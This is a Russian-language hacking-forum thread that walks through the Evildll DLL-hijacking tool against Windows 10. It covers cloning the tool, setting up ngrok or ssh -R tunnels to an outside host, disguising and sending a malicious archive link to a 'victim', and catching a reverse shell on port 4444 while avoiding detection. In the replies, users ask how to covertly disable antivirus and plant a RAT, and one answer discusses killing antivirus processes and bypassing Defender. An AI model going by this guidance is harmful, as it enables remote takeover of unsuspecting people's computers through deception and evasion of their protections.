![]() |
Привет, Уважаемые Форумчане и Друзья! Сегодня мы окунемся в мир DLL Hijacking и рассмотрим любопытный инструмент под названием Evildll от Thelinuxchoice. Да, Microsoft уже который год пытается прикрутить гайки и бороться с этой заразой, но, как видите, новые лазейки и способы атак появляются регулярно. Не верите? Смотрите, как в 2025-м обнаружилась Уязвимость dMSA в Windows Server 2025 угрожает Active Directory — она тоже сводится к подмене DLL внутри AD. Здесь мы покажем один из таких "приветов" из прошлого, который, однако, все еще вполне актуален.
В двух словах о Dll Hijacking: это когда приложение .exe при запуске вместо легитимной библиотеки подгружает вредоносную DLL-ку. В итоге, можно получить что угодно — от создания дубликатов cmd с powershell и их скрытного вызова до полноценного reverse shell, который даст вам полный контроль над удаленной машиной. Звучит интригующе, правда? Цитата:
Код: Код:
git clone https://github.com/thelinuxchoice/evildll.githttps://forum.antichat.xyz/attachmen...68528b20b5.png Инструмент, признаюсь, с характером. Немало времени ушло на то, чтобы "договориться" с ним. Один из главных подводных камней — это authtoken для ngrok. При первом запуске Evildll сам ngrok подтянет, но токен потребует. Если authtoken не подходит или сервис ограничен, обратите внимание на альтернативы ngrok в 2025 году — это оставит цепочку гибкой даже в замкнутых сетях. Я пытался закомментировать участок кода, отвечающий за проверку токена, но, увы, это может аукнуться проблемами с запуском listener. Так что лучше не лениться: либо регистрируйтесь на ngrok и получите свой токен, либо ищите, где его достать. Без него — никуда. Как только ngrok появится в директории evildll, делаем его исполняемым и прописываем токен: Код: Код:
chmod +x ngrokhttps://forum.antichat.xyz/attachmen...1f7beff9d5.png В бой: Атакуем Windows 10 Целимся, как и раньше, в бедную Windows 10. После запуска инструмента, если с токеном все хорошо, Evildll предложит два варианта атаки. Второй — для локальной сети или WAN, где вы задаете IP-адрес атакующего хоста и порт вручную. При первом способе инструмент сгенерирует вам ссылку для ngrok и запустит сервер на порту 3333. Полученную ссылку вида 0.tcp.ngrok.io:порт маскируем (шифруем, прячем за короткой ссылкой) и отправляем "жертве". Как альтернативу ngrok, можно использовать ssh -R в другом терминале: Код: Код:
ssh -R 80:localhost:3333 custom-subdomain@ssh.localhost.runЕсли нужны проверенные конфиги без ngrok, почитайте обсуждение альтернатив ngrok — там есть рабочие примеры. Минус такого подхода с ngrok/ssh — порты часто назначаются произвольно, и это не всегда срабатывает. Но если все успешно, жертве сразу же предложат скачать и сохранить архив. Браузеры, конечно, могут немного поворчать про "редко загружаемый файл", но на этом обычно все. https://forum.antichat.xyz/attachmen...877c76e30c.png Evildll тут же радостно сообщит о переходе по ссылке и предложит активировать прослушиватель на 4444 порте. https://forum.antichat.xyz/attachmen...8a93cadbcd.png Ключевой момент: атакуемый субъект должен РАЗАРХИВИРОВАТЬ архив и только потом запустить приложение .exe. Если попытаться запустить его прямо из архива, получите ошибку, и ничего не выйдет. https://forum.antichat.xyz/attachmen...7e1df84e3f.png Сам момент запуска — буквально пара секунд мелькает окно, но именно в этот миг все и происходит, с правами пользователя, который запустил файл. Мне удалось запечатлеть этот "парасекундный момент"! https://forum.antichat.xyz/attachmen...991d875ebb.png У атакующего в этот момент уже есть данные и крепкая сессия. Команды можно выполнять любые. Хоть папку lox на рабочем столе создавайте (у меня с русскоязычной символикой Blackarch пока не дружит, извините за иероглифы). https://forum.antichat.xyz/attachmen...75b6c41b56.png Можно потрогать системные файлы, выполнять команды, копировать, удалять, запускать службы. Главное — не запускайте активные приложения, это явное самообнаружение. Представьте, если на чистом рабочем столе вдруг сам собой Skype запустится — подозрительно, не так ли? https://forum.antichat.xyz/attachmen...1283f95e7e.png После успешной сессии все данные будут сохранены в файл saved в директории инструмента. Перед следующей атакой не забудьте удалить этот файл, а также архив с одноименным именем (.zip) и index.php — они сгенерируются заново. Плюсы и Минусы Evildll: Честно и Откровенно Я вам уже немного поныл про ngrok, теперь давайте разберем плюсы:
Защита: Как Не Попасться на Удочку Перед тем как перейти к чек-листу, стоит усложнить жизнь анализаторам, применяя приёмы из статьи как усложнить анализ приложения. Ну а теперь о главном — как от всего этого защититься. Опытные админы и пользователи могут сразу заподозрить неладное.
На этом у меня пока все, друзья. Надеюсь, было познавательно! Благодарю за внимание и до новых встреч в киберпространстве! Цитата:
|
Доброй ночи, спасибо вам большое.
А как можно избавиться от битой кодировки кириллицы? |
Цитата:
Прямо на месте выполняем в cmd команду chcp 65001 И можно видеть,что вывод приводится к приемлимому результату. Также это касается и сессии в Metasploit. Многие терминалы в Linux позволяют выполнить настройку кодировки UTF-8 В панели set character Encoding-UTF-8 Часто приходится пользоваться всё же командой chcp и выбирать такие кодировки: 1251-кириллица Windows 65001-UTF-8 866-кодировка DOC |
А можно ли как-то отключить антивирус и залить Rat файл, но так что бы человек не увидел этого?
Заранее, спасибо. И еще небольшая проблема, Windows Defender (Который на 10ке) палит угрозу. Может что-то не так делаю? |
Цитата:
Цитата:
|
Цитата:
В Windows 10 избежать такого не получится,т.к. в этой ОС существуют защитные настройки,которые касаются команд из cmd,связанных с правами system к примеру. Вы можете увидеть командой tasklist какие процессы занимает антивирус и догадаться что за антивирус,но если он с правами system,то убить процесс банально командой: taskkill id_процесса не получится. А до прав system дотянуться без дополнительных действий непросто (без подключения Metasploit в работу,Netcat и т.п.) Можно через cmd попытаться выполнить сложносочинённые команды для powerhell,чтобы затем сработало от того выполнение,но стоит ли оно того в случае с Rat-ником? Их же сложно замаскировать. Цитата:
Что позволяло обходить ,или пренебрегать его защитой. Microsoft срочно выпустила дополнение KB4549951 для Windows 10 и вроде подремонтировали защитника. Так что ,своевременность-вещь та,которая дороже пунктуальности). |
Цитата:
|
| Время: 04:37 |